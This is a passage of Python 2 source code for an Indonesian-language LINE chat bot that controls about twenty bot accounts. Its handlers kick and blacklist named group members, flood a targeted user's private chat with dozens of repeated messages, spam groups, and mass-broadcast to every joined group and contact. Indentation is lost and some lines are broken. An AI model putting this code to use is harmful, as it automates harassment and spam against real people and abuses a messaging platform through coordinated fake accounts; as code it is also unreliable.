satpam1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
gs = k6.getGroup(msg.to)
gs = k7.getGroup(msg.to)
gs = k8.getGroup(msg.to)
gs = k9.getGroup(msg.to)
gs = k10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
cl.sendText(msg.to,"P ????squared up!??")
ki.sendText(msg.to,"P ????squared up!??")
kk.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k1.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k2.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k5.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k10.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k13.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
k15.sendText(msg.to,"P ????squared up!??")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
k9.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k7.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k15.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
k20.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
k20.sendText(msg.to, "Target Spam, Done...!!!")
k9.sendText(msg.to, "Target Spam, Done...!!!")
k7.sendText(msg.to, "Target Spam, Done...!!!")
k15.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k15.sendText(msg.to,jawaban)
k15.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati???","Ida???","Uke???","Alyn???","Ikka???","Yunikey???","Qwenie???","Gendis???","Aryani???","Nindy???","Wina???","Dewi???","Ifah???")
jawaban = random.choice(jawab)
k7.sendText(msg.to,jawaban)
k7.sendText(msg.to,jawaban)
k7.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun???","Ahmad khan???","Hajir???","Dd???","Indra???","Jeong???","Yogi???","Ary???","Ucil???")
jawaban = random.choice(jawab)
k5.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
k11.sendText(msg.to,jawaban)
k11.sendText(msg.to,jawaban)
k11.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
a = k1.getGroupIdsJoined()
a = k2.getGroupIdsJoined()
a = k3.getGroupIdsJoined()
a = k4.getGroupIdsJoined()
a = k5.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
k4.sendText(taf, (bctxt))
k5.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
k2.sendText(msg.to,(bctxt))
k12.sendText(msg.to,(bctxt))
k13.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"??"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot moleh"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
#gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
gid = k6.getGroupIdsJoined()
gid = k7.getGroupIdsJoined()
gid = k8.getGroupIdsJoined()
gid = k9.getGroupIdsJoined()
gid = k10.getGroupIdsJoined()
gid = k11.getGroupIdsJoined()
gid = k12.getGroupIdsJoined()
gid = k13.getGroupIdsJoined()
gid = k14.getGroupIdsJoined()
gid = k15.getGroupIdsJoined()
gid = k16.getGroupIdsJoined()
gid = k17.getGroupIdsJoined()
gid = k18.getGroupIdsJoined()
gid = k19.getGroupIdsJoined()
gid = k20.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
k6.leaveGroup(i)
k7.leaveGroup(i)
k8.leaveGroup(i)
k9.leaveGroup(i)
k10.leaveGroup(i)
k11.leaveGroup(i)
k12.leaveGroup(i)
k13.leaveGroup(i)
k14.leaveGroup(i)
k15.leaveGroup(i)
k16.leaveGroup(i)
k17.leaveGroup(i)
k18.leaveGroup(i)
k19.leaveGroup(i)
k20.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body ????Har Har??")
kk.sendText(msg.to,"Hai Every Body ????Har Har??")
kc.sendText(msg.to,"Hai Every Body ????Har Har??")
elif msg.text in ["nah","Nah"]:
ki.sendText(msg.to,"Kan")
kk.sendText(msg.to,"Kan")
kc.sendText(msg.to,"Kan")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
kk.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
kc.sendText(msg.to,"PONG ????double thumbs up??????Har Har??")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
kk.sendText(msg.to,"BERHITUNG MULAI SATU")
ki.sendText(msg.to,"DUA")
cl.sendText(msg.to,"TIGA")
kc.sendText(msg.to,"EMPAT")
ks.sendText(msg.to,"LIMA")
k1.sendText(msg.to,"ENAM")
k2.sendText(msg.to,"TUJUH")
k3.sendText(msg.to,"DELAPAN")
k4.sendText(msg.to,"SEMBILAN")
k5.sendText(msg.to,"SEPULUH")
k6.sendText(msg.to,"SEBELAS")
k7.sendText(msg.to,"DUA BELAS")
